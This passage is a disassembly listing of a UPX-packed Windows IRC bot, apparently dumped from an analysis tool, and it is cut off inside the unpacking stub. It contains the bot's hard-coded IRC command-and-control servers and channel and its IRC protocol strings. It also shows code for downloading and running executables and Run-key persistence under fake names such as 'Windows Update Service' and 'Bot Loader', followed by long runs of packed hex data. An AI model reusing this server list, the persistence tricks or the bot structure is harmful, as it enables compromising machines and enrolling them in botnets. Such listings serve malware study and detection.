dd offset aIrc_tsk_ru ; "irc.tsk.ru"
dd offset aLia_zanet_net ; "lia.zanet.net"
dd offset aGaspode_zanet_ ; "gaspode.zanet.org.za"
dd offset dword_31105BF0
dword_31105BF0 dd 2E637269h, 2E72616Bh, 74656EhaGaspode_zanet_ db 'gaspode.zanet.org.za',0 ; DATA XREF: UPX0:31105BE8�o
align 4
aLia_zanet_net db 'lia.zanet.net',0 ; DATA XREF: UPX0:31105BE4�o
align 4
aIrc_tsk_ru db 'irc.tsk.ru',0 ; DATA XREF: UPX0:31105BE0�o
align 10h
aLondon_uk_eu_u db 'london.uk.eu.undernet.org',0 ; DATA XREF: UPX0:31105BDC�o
align 4
aWashington_dc_ db 'washington.dc.us.undernet.org',0 ; DATA XREF: UPX0:31105BD8�o
align 4
aLosAngeles_ca_ db 'los-angeles.ca.us.undernet.org',0 ; DATA XREF: UPX0:31105BD4�o
align 4
aBrussels_be_eu db 'brussels.be.eu.undernet.org',0 ; DATA XREF: UPX0:31105BD0�o
aCaen_fr_eu_und db 'caen.fr.eu.undernet.org',0 ; DATA XREF: UPX0:31105BCC�o
aFlanders_be_eu db 'flanders.be.eu.undernet.org',0 ; DATA XREF: UPX0:31105BC8�o
aGraz_at_eu_und db 'graz.at.eu.undernet.org',0 ; DATA XREF: UPX0:31105BC4�o
aMoscowAdvokat_ db 'moscow-advokat.ru',0 ; DATA XREF: UPX0:off_31105BC0�o
align 4
aAbcdefghijkl_0 db 'abcdefghijklmnopqrstuvwxyz',0 ; DATA XREF: sub_31101D4B+1C�o
align 4
aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0 ; DATA XREF: sub_31101D4B+C�o
align 10h
aUserS8S db 'USER %s 8 * :%s',0Dh,0Ah,0 ; DATA XREF: sub_31101E80+1C4�o
align 4
aAlready db 'already',0 ; DATA XREF: sub_31101E80+133�o
aNickS db 'NICK %s',0Dh,0Ah,0 ; DATA XREF: sub_31101E80+D9�o
; sub_31101E80+165�o
align 4
aPassS db 'PASS %s',0Dh,0Ah,0 ; DATA XREF: sub_31101E80+9C�o
align 4
aPongS db 'PONG%s',0Dh,0Ah,0 ; DATA XREF: sub_311020C2+4F�o
align 10h
aPing db 'PING',0 ; DATA XREF: sub_311020C2+C�o
; sub_31102145:loc_311021E7�o
align 4
a451 db '451',0 ; DATA XREF: sub_31102145+8E�o
aJoinS db 'JOIN %s',0Dh,0Ah,0 ; DATA XREF: sub_31102145+16�o
align 4
aQuitS db 'QUIT %s',0Dh,0Ah,0 ; DATA XREF: sub_31102217+2C�o
align 4
aPrivmsgSS db 'PRIVMSG %s %s',0Dh,0Ah,0 ; DATA XREF: sub_3110238E+3B�o
aTaty db '#taty',0 ; DATA XREF: sub_31102463+162�o
align 4
a11 db '11',0 ; DATA XREF: sub_31102463+58�o
align 10h
a_: ; DATA XREF: sub_31102463+4D�o
unicode 0, <_>,0
a_exe db '.exe',0 ; DATA XREF: sub_31102663+75�o
; sub_3110360C+4B�o
align 4
asc_31105DCC: ; DATA XREF: sub_31102663+49�o
; sub_3110360C+56�o
unicode 0, <\>,0
aMozilla4_0Comp db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_31102663+13�o
align 4
aJoin db 'JOIN',0 ; DATA XREF: sub_3110277D:loc_31102A6B�o
align 4
aQ: ; DATA XREF: sub_3110277D+2C3�o
unicode 0, <q>,0
aDD11SD db '%d,%d,11%s,%d',0 ; DATA XREF: sub_3110277D+29D�o
align 10h
aI: ; DATA XREF: sub_3110277D+253�o
unicode 0, <i>,0
asc_31105E24: ; DATA XREF: sub_3110277D+23A�o
unicode 0, <|>,0
aE: ; DATA XREF: sub_3110277D+146�o
unicode 0, <e>,0
a1D db '-1,%d',0 ; DATA XREF: sub_3110277D+78�o
align 4
aFtpupd_exe db 'ftpupd.exe',0 ; DATA XREF: UPX0:31102DEC�o
align 10h
aUser32 db 'user32',0 ; DATA XREF: sub_31102E62+9F�o
align 4
aMsvcrt db 'msvcrt',0 ; DATA XREF: sub_31102E62+91�o
align 10h
aWininet db 'wininet',0 ; DATA XREF: sub_31102E62+8A�o
aWs2_32 db 'ws2_32',0 ; DATA XREF: sub_31102E62+7D�o
align 10h
aU10 db 'u10',0 ; DATA XREF: sub_31102E62+6B�o
aU9 db 'u9',0 ; DATA XREF: sub_31102E62+5F�o
align 4
aU8 db 'u8',0 ; DATA XREF: sub_31102E62+55�o
align 4
aU10x db 'u10x',0 ; DATA XREF: sub_31102E62+39�o
align 4
aU11x db 'u11x',0 ; DATA XREF: sub_31102E62+23�o
align 4
asc_31105E7C db 0Dh,0Ah,0 ; DATA XREF: sub_31102FCD+124�o
align 10h
aUseridUnix db ' : USERID : UNIX : ',0 ; DATA XREF: sub_31102FCD+104�o
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_31102C74+23�o
; sub_31103565+58�o ...
align 4
aWindowsUpdate db 'Windows Update',0 ; DATA XREF: sub_31102C74+1C�o
; sub_3110360C+87�o ...
align 4
aSoftwareMicr_0 db 'Software\Microsoft\Wireless',0 ; DATA XREF: sub_311036D8+5A�o
; sub_311036D8+94�o
aClient db 'Client',0 ; DATA XREF: sub_311036D8+55�o
; sub_311036D8+8E�o
align 4
aAvserve2_exeup db 'avserve2.exeUpdate Service',0 ; DATA XREF: sub_31103565+47�o
align 4
aAvserve_exe db 'avserve.exe',0 ; DATA XREF: sub_31103565+40�o
aWindowsUpdateS db 'Windows Update Service',0 ; DATA XREF: sub_31103565+39�o
align 4
aWinupdate db 'WinUpdate',0 ; DATA XREF: sub_31103565+32�o
align 4
aSystray db 'SysTray',0 ; DATA XREF: sub_31103565+2B�o
aBotLoader db 'Bot Loader',0 ; DATA XREF: sub_31103565+24�o
align 4
aSystemRestoreS db 'System Restore Service',0 ; DATA XREF: sub_31103565+1D�o
align 10h
aDiskDefragment db 'Disk Defragmenter',0 ; DATA XREF: sub_31103565+16�o
align 4
aWindowsSecurit db 'Windows Security Manager',0 ; DATA XREF: sub_31103565+F�o
align 10h
a1: ; DATA XREF: sub_311036D8+50�o
unicode 0, <1>,0
dd 9 dup(0)
dword_31105FC8 dd 0 ; sub_31102463+14B�w ...
dword_31105FCC dd 0 ; sub_3110277D+E8�r ...
dword_31105FD0 dd 8 dup(0) ; sub_3110277D+A�o
dword_31105FF0 dd 0 dword_31105FF4 dd 0 ; sub_31102C74+80�w
dword_31105FF8 dd 0 ; sub_31102C26+25�o ...
dword_31105FFC dd 0 ; sub_31102C74+75�w ...
UPX0 ends
; Section 2. (virtual address 00006000)
; Virtual size : 00003000 ( 12288.)
; Section size in file : 00003000 ( 12288.)
; Offset to raw data for section: 00006000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 31106000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31106000 dd 68h ; UPX0:31102E0C�w ...
dword_31106004 dd 0 ; sub_31102E62+34�w
dword_31106008 dd 8 dup(0) dword_31106028 dd 0 ; sub_311032D9+69�r
dword_3110602C dd 31100000h ; UPX0:31102DF1�w
dword_31106030 dd 0 ; sub_3110318A+37�o ...
dword_31106034 dd 0 ; sub_311032D9+37�w ...
word_31106038 dw 0 ; DATA XREF: sub_31103126+3B�r
; sub_3110318A:loc_311031EB�r ...
align 4
dword_3110603C dd 0 ; sub_311036D8+3C�w ...
dd 3F0h dup(0)
dd 0C4h, 40h, 72695601h, 6C617574h, 65657246h, 69560100h
dd 61757472h, 6C6C416Ch, 100636Fh, 4D746547h, 6C75646Fh
dd 6C694665h, 6D614E65h, 1004165h, 7274736Ch, 69706D63h
dd 43010041h, 4679706Fh, 41656C69h, 69570100h, 6578456Eh
dd 43010063h, 74616572h, 6F6F5465h, 6C65686Ch, 53323370h
dd 7370616Eh, 746F68h, 6F725001h, 73736563h, 69463233h
dd 747372h, 72655401h, 616E696Dh, 72506574h, 7365636Fh
dd 50010073h, 65636F72h, 32337373h, 7478654Eh, 704F0100h
dd 76456E65h, 41746E65h, 65440100h, 6574656Ch, 656C6946h
dd 45010041h, 50746978h, 65636F72h, 1007373h, 46746547h
dd 53656C69h, 657A69h, 61655201h, 6C694664h, 49010065h
dd 7265746Eh, 6B636F6Ch, 6E496465h, 6D657263h, 746E65h
dd 65724301h, 50657461h, 65636F72h, 417373h, 65724301h
dd 4D657461h, 78657475h, 6C010041h, 63727473h, 41706Dh
dd 74654701h, 61636F4Ch, 6E49656Ch, 416F66h, 74736C01h
dd 74616372h, 6C010041h, 63727473h, 417970h, 74654701h
dd 7473614Ch, 6F727245h, 53010072h, 65747379h, 6D69546Dh
dd 466F5465h, 54656C69h, 656D69h, 74654701h, 74737953h
dd 69546D65h, 100656Dh, 736F6C43h, 6E614865h, 656C64h
dd 69725701h, 69466574h, 100656Ch, 61657243h, 69466574h
dd 41656Ch, 74736C01h, 79706372h, 100416Eh, 43746553h
dd 65727275h, 6944746Eh, 74636572h, 4179726Fh, 65470100h
dd 73795374h, 446D6574h, 63657269h, 79726F74h, 45010041h
dd 54746978h, 61657268h, 53010064h, 76457465h, 746E65h
dd 69615701h, 726F4674h, 676E6953h, 624F656Ch, 7463656Ah
dd 72430100h, 65746165h, 65726854h, 1006461h, 61657243h
dd 76456574h, 41746E65h, 736C0100h, 656C7274h, 100416Eh
dd 65656C53h, 47010070h, 75437465h, 6E657272h, 6F725074h
dd 73736563h, 65470100h, 6F725074h, 64644163h, 73736572h
dd 6F4C0100h, 694C6461h, 72617262h, 1004179h, 74697257h
dd 6F725065h, 73736563h, 6F6D654Dh, 1007972h, 6E65704Fh
dd 636F7250h, 737365h, 74654701h, 75646F4Dh, 6148656Ch
dd 656C646Eh, 47010041h, 69547465h, 6F436B63h, 746E75h
dd 0D100h, 0
dd 65520100h, 65724367h, 4B657461h, 78457965h, 52010041h
dd 65536765h, 6C615674h, 78456575h, 52010041h, 75516765h
dd 56797265h, 65756C61h, 417845h, 67655201h, 6E65704Fh
dd 4579654Bh, 1004178h, 44676552h, 74656C65h, 6C615665h
dd 416575h, 67655201h, 736F6C43h, 79654B65h, 62410100h
dd 5374726Fh, 65747379h, 7568536Dh, 776F6474h, 100416Eh
dd 70797243h, 65724374h, 48657461h, 687361h, 79724301h
dd 61487470h, 61446873h, 1006174h, 70797243h, 72655674h
dd 53796669h, 616E6769h, 65727574h, 43010041h, 74707972h
dd 74736544h, 48796F72h, 687361h, 79724301h, 65447470h
dd 6F727473h, 79654B79h, 72430100h, 52747079h, 61656C65h
dd 6F436573h, 7865746Eh, 43010074h, 74707972h, 75716341h
dd 43657269h, 65746E6Fh, 417478h, 79724301h, 6D497470h
dd 74726F70h, 79654Bh, 0DE00h, 0F800h, 74730100h, 79706372h
dd 74730100h, 74616372h, 655F0100h, 70656378h, 61685F74h
dd 656C646Eh, 1003372h, 696F7461h, 72730100h, 646E61h
dd 48455F01h, 6F72705Fh, 676F6Ch, 435F5F01h, 72467878h
dd 48656D61h, 6C646E61h, 1007265h, 73727473h, 1007274h
dd 63727473h, 1007268h, 6C727473h, 1006E65h, 736D656Dh
dd 1007465h, 636D656Dh, 1007970h, 646E6172h, 0E90000h
dd 1300000h, 77010000h, 69727073h, 4166746Eh, 65470100h
dd 726F4674h, 6F726765h, 57646E75h, 6F646E69h, 46010077h
dd 57646E69h, 6F646E69h, 1004177h, 57746547h, 6F646E69h
dd 72685477h, 50646165h, 65636F72h, 64497373h, 0F40000h
dd 1440000h, 49010000h, 7265746Eh, 4F74656Eh, 416E6570h
dd 6E490100h, 6E726574h, 65477465h, 6E6F4374h, 7463656Eh
dd 74536465h, 657461h, 746E4901h, 656E7265h, 65704F74h
dd 6C72556Eh, 49010041h, 7265746Eh, 5274656Eh, 46646165h
dd 656C69h, 10000h, 15800h, 8FF00h, 0FF0073FFh, 6FFF0039h
dd 0BFF00h, 0FF0034FFh, 0CFF0012h, 4FF00h, 0FF0016FFh
dd 9FF0017h, 2FF00h, 0FF000DFFh, 3FF0001h, 10FF00h, 13FFh
dd 0
dd 4550h, 2014Ch, 40C0EED6h, 2 dup(0)
dd 10F00E0h, 6010Bh, 3200h, 1200h, 0
dd 2DE4h, 1000h, 5000h, 31100000h, 1000h, 200h, 4, 0
dd 4, 0
dd 7000h, 400h, 0
dd 2, 100000h, 1000h, 100000h, 1000h, 0
dd 10h, 2 dup(0)
dd 3900h, 8Ch, 14h dup(0)
dd 1000h, 1A4h, 6 dup(0)
dd 7865742Eh, 74h, 30A8h, 1000h, 3200h, 400h, 3 dup(0)
dd 0E0040020h, 7461642Eh, 61h, 1040h, 5000h, 1000h, 3600h
dd 3 dup(0)
dd 0C0000040h, 6000h, 3B30h, 651Ch, 42C33400h, 9808117Fh
dd 0E7B7B21Ch, 0FFFFFF9Ch, 77899DFFh, 0D3971A3Dh, 8D5029A4h
dd 463A96A5h, 12E8FC8Dh, 0AF10EB16h, 0F8457044h, 78966AD0h
dd 0FFFFFFB1h, 51439FFFh, 86A827EBh, 98A3970h, 0A1C214DEh
dd 167A53C1h, 1A85C4BFh, 29E70F61h, 66209E98h, 0FFFFFF89h
dd 0B1FE53FFh, 0CA94070Ch, 1E75A3ECh, 0E8F91DA1h, 4ECBC5B4h
dd 0D7F0DB1Ah, 1A873969h, 0C67B948Ch, 0FFFFFF18h, 0B38213FFh
dd 424BBF3Eh, 0EB67E0h, 60B73784h, 0D7D8B3AAh, 65048022h
dd 0FF4BA67Ah, 45855886h, 0FFF20BF6h, 0EEF96EFFh, 2FC956h
dd 0A63B4A32h, 0D3D87AB7h, 6E6F63EBh, 0FF6D7874h, 36127FFFh
dd 0ABAAAAD5h, 66C9335Dh, 8D0226B9h, 0FE8B0575h, 993C068Ah
dd 0A2DF4607h, 2C06BFFFh, 99344630h, 0E2470788h, 0E80AEBEDh
dd 622E51DAh, 6FFF6765h, 712EFBFFh, 1C99993h, 91BDFD12h
dd 0C10716FDh, 42AA6872h, 0FDAA66FDh, 0DBB1BA10h, 1C14F7F7h
dd 0C91A98F1h, 860898F3h, 10087102h, 0FFB1DB7Dh, 37CB5F90h
dd 1C965992h, 75180DBBh, 0CD089B03h, 0AF6C8FECh, 0D5251025h
dd 5447ECE4h, 0FB1B5D18h, 0F31DBEC7h, 9BF3449Fh, 0F319AE71h
dd 1065E368h, 0D60B1C1Ch, 1A1FEEFEh, 5EFFD975h, 0FF24BD9Dh
dd 0FF4DDC12h, 70ADD10h, 0F73BEDFFh, 33AC4Fh, 59B29D0Bh
dd 3298E514h, 0F3451232h, 7D66CA89h, 2CB3D9FFh, 0B36E7133h
dd 74416713h, 8AD95D1Ah, 6DF7BA34h, 9DF3119Fh, 98904F1h
dd 0F32D04F1h, 0E93F6D9Bh, 0F367642Eh, 0E476F0E3h, 93F62182h
dd 56C92EC9h, 0C0E86F21h, 7EDB2097h, 169BD932h, 0E5C1D83Fh
dd 19C98ED5h, 0AF7FB1ECh, 0D9013BC9h, 23E90414h, 632871CAh
dd 0FCB230BFh, 9161688Dh, 66F4C3F5h, 12CDA7EDh, 0BB6B36C9h
dd 0CBC96C5Dh, 0F556794Eh, 0C9FD9327h, 0A6485A10h, 0E014C096h
dd 2E4FDF4Ch, 0EBA729FBh, 0FE5D9CF3h, 7126F434h, 9BFFC5D0h
dd 3BF927FDh, 0A8ECEF13h, 0B7010CA8h, 0E9EDFFC5h, 211FC2ECh
dd 0B7FDE9FFh, 99FCE1FCh, 0FCF5CAC9h, 0FFCFE9FCh, 0F2FF97FFh
dd 0FCF7EBFCh, 0C7ABAAF5h, 59AAF934h, 662A2DB4h, 0E6ACC91Eh
dd 0C9A5B7E7h, 0ECFE379Ch, 9DB8BDF2h, 30927182h, 513519BFh
dd 0A951F14h, 0DD8C1FFFh, 712A9172h, 0A5D231C8h, 0E180D512h
dd 6FAA529Ah, 0FB788D14h, 9A2AFF6Fh, 8B12B9C8h, 58474A9Ah
dd 9BAB9E59h, 20A319DBh, 0FFA26CECh, 0C15FFFB7h, 0DF9EED85h
dd 0EB81E8A2h, 0C8125544h, 2E961FBDh, 0D812EB8Dh, 125A9A85h
dd 0F9A1613Fh, 5A9A099Dh, 182EF810h, 7F664918h, 6DEDDBFDh
dd 8712FEF7h, 95C25AA9h, 82128502h, 0CB5A9104h, 0CFF7F5F7h
dd 85DECF68h, 424D53FFh, 53180972h, 5EFFFFC8h, 0FE2148h
dd 2006217h, 4E204350h, 4F575445h, 0F97DAC52h, 50204BFFh
dd 52474F52h, 31204D41h, 414C302Eh, 0A024D4Eh, 7FA5F6FEh
dd 646E6957h, 8C73776Fh, 5720726Fh, 72676B03h, 6170756Fh
dd 0EDF75BFh, 61312E33h, 32234D27h, 32303058h, 0DFE56B32h
dd 0A1632DAh, 4C20544Eh, 1630204Dh, 0E464AD8Bh, 773A439h
dd 56EDF60Dh, 23FF0C9Eh, 0A110400h, 0BB5B2014h, 0D4058C00h
dd 4C0069B6h, 0C91E534Bh, 5053EA9Bh, 8297F200h, 57E008h
dd 0DFFB9B62h, 64006E24h, 77006F00h, 743A7300h, 44B60130h
dd 8C09F6F6h, 23350039h, 644E2E1Dh, 7E603h, 2008ABDAh
dd 79019264h, 369F57DAh, 39C09D8h, 23466E00h, 0F2370747h
dd 6400C80h, 1100600h, 3FFE5FFFh, 888A151Fh, 4F0048E0h
dd 19814400h, 0E4F27A6Ah, 0AF281C49h, 4DF22530h, 1074F604h
dd 5CE15367h, 0C1D775DFh, 3014F2h, 12F5C04h, 0F75DC85Ah
dd 615C083Ah, 36072E4Dh, 0B60E3800h, 772ED8DDh, 491B30h
dd 0E46443ECh, 6CEC39h, 0A264633Fh, 3E5B7FCh, 4004DC08h
dd 0DE00FF16h, 0E00DEh, 0D8484C16h, 2019F83h, 0F70D4026h
dd 192826FDh, 6C8B1103h, 77C874D9h, 70D31BD9h, 9C2A6300h
dd 67B0256Bh, 109F52DBh, 1B04480Eh, 3BAEBADBh, 5A541354h
dd 22596326h, 0FE69C75Ch, 45CB9F73h, 58765h, 4810030Bh
dd 76803A4h, 0A10110B8h, 0FFD8FF01h, 19286AFFh, 0D0B10C39h
dd 0A89B11h, 2ED94FC0h, 885D5FF5h, 0C91CEB8Ah, 0FB2F6411h
dd 3CE89FC2h, 6048102Bh, 0A3F40CD1h, 5CF92BC8h, 0A00CA060h
dd 64720Ch, 0CB179h, 0F24F0CA0h, 408877FDh, 0EC000900h
dd 95000703h, 0D914014h, 7C4F08F6h, 0BF4070h, 0D911FF07h
dd 7813434Bh, 0AB001385h, 0C813A65Bh, 13E984F3h, 0FF2FF810h
dd 9E318090h, 40230EFEh, 83A4FBD2h, 88840861h, 0EE10B943h
dd 0C9E4F2FFh, 10B801A7h, 0DAD200Ch, 6CC3E42Bh, 0D80F7F07h
dd 0CB3E4AF2h, 84700118h, 0F90F840Fh, 951F200Dh, 7F02000Fh
dd 0F090F84h, 0F6C3C9Bh, 6FA89A00h, 55BD9118h, 0E5611343h
dd 6923109Fh, 2050586Eh, 42007250h, 46036D9Eh, 323B014Ah
dd 0E49E426Bh, 15123C87h, 53410275h, 0BD914E00h, 19E1C26h
dd 0CDFF06EBh, 5CCC57FFh, 5C73255Ch, 24637069h, 1CEC8166h
dd 0E4FF07h, 0BFCFFF53h, 654465FCh, 69677562h, 656C6976h
dd 64416567h, 7473756Ah, 0C96B6F54h, 65D9336Dh, 4C73176Eh
dd 7075126Fh, 3FBB7EDBh, 756C6156h, 4F174165h, 636F2870h
dd 3F347324h, 4317FF06h, 61766461h, 0EF336970h, 72657475h
dd 0FF37B76Dh, 3131FFh, 6C656853h, 72545F6Ch, 6E577961h
dd 65724364h, 65521A61h, 0DBB9DF6Dh, 54056F6Dh, 56140C68h
dd 75747269h, 0DDAC4158h, 4F28ADDAh, 4E0F7845h, 47356E72h
dd 0FEE9A69Ah, 31105CF4h, 0A8C003DCh, 9A6C6C8Ch, 304C69A6h
dd 5BFC1424h, 0B337F6A3h, 2E634AF0h, 2E72616Bh, 44B7E240h
dd 61677FF7h, 646F7073h, 617A2E65h, 67B52E0Dh, 0B37B9F09h
dd 696C533Fh, 0F251361h, 13767433h, 6B73F0CDh, 8271722Eh
dd 752E6EE8h, 6BD8BA0Dh, 57565EDh, 273B8A0Bh, 5DD68577h
dd 0CA684FD8h, 641F7467h, 2B6D2E31h, 6C1F647Fh, 612D736Fh
dd 5B1A65BAh, 63D95DA1h, 60622061h, 0DB731D2Dh, 45533296h
dd 55652F5Dh, 9EF60466h, 661772B2h, 330E616Ch, 0FF2536A9h
dd 7A617267h, 6D74612Eh, 5CF0E287h, 2D7770C1h, 0D61E998Eh
dd 0BB76FFB4h, 2163629Bh, 6ABF6766h, 6E6D6C6Bh, 5271706Fh
dd 2FC4BFFCh, 78777673h, 41B97A79h, 45444342h, 49484746h
dd 0A8154B4Ah, 0E84EB56Fh, 54535251h, 6FC6FEB3h, 1B5A960Bh
dd 52455355h, 38204220h, 3A202A20h, 0DDF0F12Eh, 4B0A0D07h
dd 0E879B76Ch, 0C6D94349h, 13318560h, 0B53DE50h, 3D9BA57Eh
dd 0A474E4Fh, 3407490Bh, 6B0FC935h, 4F4A0B37h, 55512F0Ch
dd 7B1D5449h, 49523C5Bh, 66473156h, 0D8742311h, 0B5B70EDCh
dd 3E1779h, 78E0075Fh, 0C57F1A17h, 6F4D71A3h, 2F13887Ah
dd 0EDDB8534h, 28209542h, 2A706DE5h, 86706269h, 3BDBE85Ch
dd 45494020h, 3BAB3620h, 0A177DF20h, 7D358086h, 4E770029h
dd 5AE0713Fh, 64253773h, 6859022Ch, 99FB3E07h, 7C03FBEEh
dd 13312D60h, 8F707466h, 0F236F1D2h, 73C77564h, 0A39B1E89h
dd 76736DF1h, 5C03A563h, 0ADBA3569h, 325FDDF1h, 8575175Fh
dd 38073903h, 0C473E45Eh, 3107BD0Bh, 1F785BDCh, 42203416h
dd 30084449h, 0DFDA0658h, 4F1392E8h, 52416D46h, 694D5C45h
dd 0DB07C253h, 6F6FAB16h, 435CB35Ch, 3B5B7275h, 6EF0D1BDh
dd 69F15674h
dd 75525C66h, 0BAE1D058h, 94550ED6h, 315393EDh, 0AD6131E9h
dd 723F278Bh, 1AEEB176h, 0DC43635Ch, 0B876A33Fh, 64326576h
dd 0C5F67B9Bh, 10532037h, 0DC1B6530h, 1ABD90B2h, 4B17235Bh
dd 6EC36E9Fh, 0C073796Fh, 20B34200h, 5B1CC5BAh, 1369610Fh
dd 3A206D1Bh, 0C8568D60h, 44377206h, 0DB773D69h, 5E20485Ah
dd 6D672F66h, 61422A88h, 246392DBh, 0DA69DE63h, 6B1883ABh
dd 1A1ED38Dh, 0A86AA000h, 0D9C40008h, 3F138ACFh, 72466401h
dd 0F80C6565h, 7122BDBFh, 7465470Dh, 75646F4Dh, 0FE46656Ch
dd 0E3ADE2B7h, 0E06D614Eh, 74736C01h, 706D6372h, 7B816F69h
dd 6F430AEFh, 0A197970h, 657845C9h, 70AC7C56h, 6F54C632h
dd 4DDF6C6Fh, 70FFF6A0h, 6E533233h, 68737061h, 1419746Fh
dd 0ADDD40ADh, 73723212h, 3507540Fh, 730580F7h, 4E21182Ch
dd 0BA207865h, 49206C42h, 5F2B7645h, 5AC16E44h, 6C29C421h
dd 0A2746969h, 34C973FBh, 695316A3h, 6752BE7Ah, 7E95ED88h
dd 6249090Dh, 0DA2199C4h, 64656B76h, 7394630Ah, 6C3A059Dh
dd 0F4170B2h, 6DE5934Dh, 0DA78B2ECh, 3B4C5441h, 0E4656C61h
dd 66D86D61h, 2329196Fh, 51087970h, 0D611B7Eh, 6F727245h
dd 0EC59F672h, 6954F73Dh, 981FB6Dh, 0B8AD1823h, 86E6E40h
dd 7BB74865h, 0A17F66C3h, 0D1697257h, 67610B86h, 6E2EEB44h
dd 0F73E530Ah, 0B11AF644h, 5063C611h, 0E835478h, 13144B03h
dd 845D2D36h, 63373637h, 0DEE64661h, 5320B40Ah, 624F5B9Ch
dd 0D86D2E6Ah, 2C1B0D9Bh, 8BDE2F0Dh, 296D62DDh, 7065067Bh
dd 0BFD8826Ch, 0B713084h, 72646441h, 0EFBD9B0Fh, 694CF988h
dd 88617262h, 4D82BD6h, 0A34D06D7h, 0CC3EC99Dh, 5418CC26h
dd 0B14DD008h, 0A91F2851h, 0D1A0754Eh, 4498684Fh, 9F67CCA8h
dd 2276654Bh, 4579CEE7h, 0F69DA10h, 1DAD612Fh, 11600A51h
dd 23362C6Bh, 21383060h, 0BDBB4210h, 0C5183C3h, 499C6241h
dd 0E3452BDh, 89026853h, 9B46B0F7h, 707972BDh, 0B9A07774h
dd 6D98AE10h, 12440A5Fh, 61860E61h, 69E163ADh, 67567966h
dd 362B75BFh, 0B436F616h, 796F3E6Ch, 36D6112Ch, 106FF677h
dd 651E8F52h, 0F90DEAEBh, 14E48F67h, 75716341h, 0E7057269h
dd 494D871Ah, 133AA08Ah, 9A719B3Bh, 71BF8DEh, 0DC3A3E61h
dd 2F5FAD0Ah, 685F2A55h, 6B775C4Bh, 15119005h, 721F696Fh
dd 6B6EF410h, 48451EEFh, 0F27F705Fh, 435F0B67h, 0D8B97878h
dd 0C5E5A9ACh, 2452C48h, 9D9B656Dh, 1707684Dh, 0D96D226Eh
dd 0A2B62C5Eh, 4C6D0774h, 0B613E984h, 130B36Dh, 69537377h
dd 45BA66AAh, 5F1D0133h, 3622F565h, 0CE62D1ACh, 210BC814h
dd 6CC66306h, 4906700Bh, 0E9A74E89h, 0AB44F44Fh, 0D96E0DA3h
dd 0E41BA83h, 0C26E1139h, 0B31C970Ch, 8F7453C3h, 60292529h
dd 2CAB55EDh, 9B6CB2F9h, 58034FCDh, 730208FFh, 2CB2CB39h
dd 340B6FCBh, 2C040C12h, 162CB2CBh, 0D020917h, 0B2CB2C67h
dd 13100301h, 6F9507Ah, 0DF45A850h, 0C0EED673h, 0FB66B340h
dd 0F00E007h, 6010B01h, 1312320Ch, 0D573D57Dh, 30AA2DE4h
dd 4B3731B3h, 20B8D56h, 600C0727h, 70496E67h, 710341Eh
dd 6C9672D5h, 8C390206h, 58402ED8h, 1A4649Fh, 1EED831Eh
dd 77E2E57h, 329030A8h, 6060841Fh, 0E0047CC4h, 0DF6642Eh
dd 0FB0A4ED9h, 27360740h, 161B8E96h, 6000C038h, 1C3B31h
dd 96180000h, 1200h, 0FFh, 2 dup(0)
; ---------------------------------------------------------------------------
pusha
mov esi, offset dword_31106000
lea edi, [esi-5000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_31108242
; ---------------------------------------------------------------------------
align 8
loc_31108238: ; CODE XREF: UPX1:loc_31108249�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_3110823E: ; CODE XREF: UPX1:311082D6�j
; UPX1:311082ED�j
add ebx, ebx
jnz short loc_31108249
loc_31108242: ; CODE XREF: UPX1:31108230�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31108249: ; CODE XREF: UPX1:31108240�j
jb short loc_31108238
mov eax, 1
loc_31108250: ; CODE XREF: UPX1:3110825F�j
; UPX1:3110826A�j
add ebx, ebx
jnz short loc_3110825B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_3110825B: ; CODE XREF: UPX1:31108252�j
adc eax, eax
add ebx, ebx
jnb short loc_31108250
jnz short loc_3110826C
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_31108250
loc_3110826C: ; CODE XREF: UPX1:31108261�j
xor ecx, ecx
sub eax, 3
jb short loc_31108280
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_311082F2
mov ebp, eax
loc_31108280: ; CODE XREF: UPX1:31108271�j
add ebx, ebx
jnz short loc_3110828B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_3110828B: ; CODE XREF: UPX1:31108282�j
adc ecx, ecx
add ebx, ebx
jnz short loc_31108298
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31108298: ; CODE XREF: UPX1:3110828F�j
adc ecx, ecx
jnz short loc_311082BC
inc ecx
loc_3110829D: ; CODE XREF: UPX1:311082AC�j
; UPX1:311082B7�j
add ebx, ebx
jnz short loc_311082A8
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_311082A8: ; CODE XREF: UPX1:3110829F�j
adc ecx, ecx
add ebx, ebx
jnb short loc_3110829D
jnz short loc_311082B9
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_3110829D
loc_311082B9: ; CODE XREF: UPX1:311082AE�j
add ecx, 2
loc_311082BC: ; CODE XREF: UPX1:3110829A�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_311082DC
loc_311082CD: ; CODE XREF: UPX1:311082D4�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_311082CD
jmp loc_3110823E
; ---------------------------------------------------------------------------
align 4
loc_311082DC: ; CODE XREF: UPX1:311082CB�j
; UPX1:311082E9�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_311082DC
add edi, ecx
jmp loc_3110823E
; ---------------------------------------------------------------------------
loc_311082F2: ; CODE XREF: UPX1:3110827C�j
pop esi
mov edi, esi
mov ecx, 0B4h
loc_311082FA: ; CODE XREF: UPX1:31108301�j
; UPX1:31108306�j
mov al, [edi]
inc edi
sub al, 0E8h
